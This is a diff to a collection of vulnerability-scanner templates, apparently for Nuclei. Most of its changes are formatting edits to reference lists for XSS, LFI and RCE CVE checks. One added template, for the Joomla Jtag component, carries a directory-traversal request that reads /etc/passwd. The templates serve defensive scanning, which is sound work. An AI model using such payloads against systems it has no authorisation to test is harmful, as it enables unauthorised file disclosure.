- https://www.cvedetails.com/cve/CVE-2012-4878
|
- https://www.cvedetails.com/cve/CVE-2012-4878
|
||||||
tags: cve,cve2012,lfi
|
tags: cve,cve2012,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
|
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.securityfocus.com/bid/52841/info
|
- https://www.securityfocus.com/bid/52841/info
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
|
||||||
tags: cve,cve2012,xss,manageengine
|
tags: cve,cve2012,xss,manageengine
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
|
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/26955
|
- https://www.exploit-db.com/exploits/26955
|
||||||
- https://www.cvedetails.com/cve/CVE-2013-5979
|
- https://www.cvedetails.com/cve/CVE-2013-5979
|
||||||
- https://bugs.launchpad.net/xibo/+bug/1093967
|
- https://bugs.launchpad.net/xibo/+bug/1093967
|
||||||
|
|
|
@ -5,9 +5,9 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
|
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/38936
|
- https://www.exploit-db.com/exploits/38936
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
||||||
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
|
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
|
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/39287
|
- https://www.exploit-db.com/exploits/39287
|
||||||
- https://www.cvedetails.com/cve/CVE-2014-5368
|
- https://www.cvedetails.com/cve/CVE-2014-5368
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
|
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/35346
|
- https://www.exploit-db.com/exploits/35346
|
||||||
- https://www.cvedetails.com/cve/CVE-2014-8799
|
- https://www.cvedetails.com/cve/CVE-2014-8799
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
|
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
|
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
|
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: WordPress Plugin RobotCPA 5 - Directory Traversal
|
name: WordPress Plugin RobotCPA 5 - Directory Traversal
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
reference: |
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
|
||||||
- https://www.exploit-db.com/exploits/37252
|
- https://www.exploit-db.com/exploits/37252
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
|
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
|
||||||
reference: |
|
reference:
|
||||||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
|
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
|
||||||
- https://wordpress.org/plugins/anti-plagiarism
|
- https://wordpress.org/plugins/anti-plagiarism
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
|
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
|
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
|
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -5,7 +5,9 @@ info:
|
||||||
author: daffainfo,0x240x23elu
|
author: daffainfo,0x240x23elu
|
||||||
severity: high
|
severity: high
|
||||||
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
|
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
|
||||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
|
reference:
|
||||||
|
- https://cxsecurity.com/issue/WLB-2016080220
|
||||||
|
- https://wpvulndb.com/vulnerabilities/8609
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,lfi
|
tags: cve,cve2016,wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: critical
|
severity: critical
|
||||||
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
|
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
|
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
|
||||||
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
|
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://www.vulnerability-lab.com/get_content.php?id=1808
|
- https://www.vulnerability-lab.com/get_content.php?id=1808
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
|
||||||
tags: cve,cve2016,wordpress,wp-theme,xss
|
tags: cve,cve2016,wordpress,wp-theme,xss
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
|
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
|
||||||
reference: |
|
reference:
|
||||||
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
|
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
|
||||||
- https://www.cvedetails.com/cve/CVE-2016-2389
|
- https://www.cvedetails.com/cve/CVE-2016-2389
|
||||||
tags: cve,cve2016,lfi,sap
|
tags: cve,cve2016,lfi,sap
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
|
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/44054
|
- https://www.exploit-db.com/exploits/44054
|
||||||
- https://www.cvedetails.com/cve/CVE-2017-15647
|
- https://www.cvedetails.com/cve/CVE-2017-15647
|
||||||
tags: cve,cve2017,lfi,router
|
tags: cve,cve2017,lfi,router
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
|
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
|
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
|
||||||
tags: cve,cve2017,wordpress,xss,wp-plugin
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -6,9 +6,9 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
|
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
|
||||||
tags: cve,cve2017,wordpress
|
tags: cve,cve2017,wordpress
|
||||||
reference: |
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
|
||||||
- https://www.exploit-db.com/exploits/41497
|
- https://www.exploit-db.com/exploits/41497
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -16,6 +16,7 @@ requests:
|
||||||
- "{{BaseURL}}/wp-json/wp/v2/users/"
|
- "{{BaseURL}}/wp-json/wp/v2/users/"
|
||||||
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
|
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
@ -33,8 +34,9 @@ requests:
|
||||||
- '"name":'
|
- '"name":'
|
||||||
- '"avatar_urls":'
|
- '"avatar_urls":'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '"name":"[^"]*"'
|
- '"name":"[^"]*"'
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
|
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/45678
|
- https://www.exploit-db.com/exploits/45678
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
|
||||||
tags: cve,cve2018,lfi,router,dlink
|
tags: cve,cve2018,lfi,router,dlink
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
|
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
|
||||||
reference: |
|
reference:
|
||||||
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
|
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
|
||||||
- https://www.exploit-db.com/exploits/48614
|
- https://www.exploit-db.com/exploits/48614
|
||||||
|
|
|
@ -0,0 +1,19 @@
|
||||||
|
id: CVE-2018-15473
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OpenSSH Username Enumeration
|
||||||
|
author: r3dg33k,daffainfo
|
||||||
|
severity: low
|
||||||
|
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
|
||||||
|
tags: network,openssh,cve,cve2018
|
||||||
|
|
||||||
|
network:
|
||||||
|
- host:
|
||||||
|
- "{{Hostname}}"
|
||||||
|
- "{{Hostname}}:22"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- 'SSH-2.0-OpenSSH_[1-7].*'
|
|
@ -4,9 +4,9 @@ info:
|
||||||
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
|
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
|
||||||
- https://www.exploit-db.com/exploits/45342
|
- https://www.exploit-db.com/exploits/45342
|
||||||
tags: cve,cve2018,iot,lfi
|
tags: cve,cve2018,iot,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
|
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/45440
|
- https://www.exploit-db.com/exploits/45440
|
||||||
- https://www.cvedetails.com/cve/CVE-2018-16288
|
- https://www.cvedetails.com/cve/CVE-2018-16288
|
||||||
tags: cve,cve2018,lfi
|
tags: cve,cve2018,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
|
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/45780
|
- https://www.exploit-db.com/exploits/45780
|
||||||
- https://www.cvedetails.com/cve/CVE-2018-19458
|
- https://www.cvedetails.com/cve/CVE-2018-19458
|
||||||
tags: cve,cve2018,lfi
|
tags: cve,cve2018,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
|
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
|
||||||
reference: |
|
reference:
|
||||||
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
|
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
|
||||||
- https://www.cvedetails.com/cve/CVE-2018-20470
|
- https://www.cvedetails.com/cve/CVE-2018-20470
|
||||||
tags: cve,cve2018,lfi
|
tags: cve,cve2018,lfi
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion
|
name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
|
description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
|
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
|
||||||
- https://www.cvedetails.com/cve/CVE-2018-20985/
|
- https://www.cvedetails.com/cve/CVE-2018-20985/
|
||||||
severity: high
|
severity: high
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2018-6008
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/43913
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2018-6008
|
||||||
|
tags: cve,cve2018,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
|
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
|
||||||
reference: |
|
reference:
|
||||||
- https://security401.com/grandnode-path-traversal/
|
- https://security401.com/grandnode-path-traversal/
|
||||||
- https://www.cvedetails.com/cve/CVE-2019-12276
|
- https://www.cvedetails.com/cve/CVE-2019-12276
|
||||||
tags: cve,cve2019,lfi
|
tags: cve,cve2019,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
|
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/47214
|
- https://www.exploit-db.com/exploits/47214
|
||||||
- https://www.cvedetails.com/cve/CVE-2019-14312
|
- https://www.cvedetails.com/cve/CVE-2019-14312
|
||||||
tags: cve,cve2019,lfi
|
tags: cve,cve2019,lfi
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
|
name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/9815
|
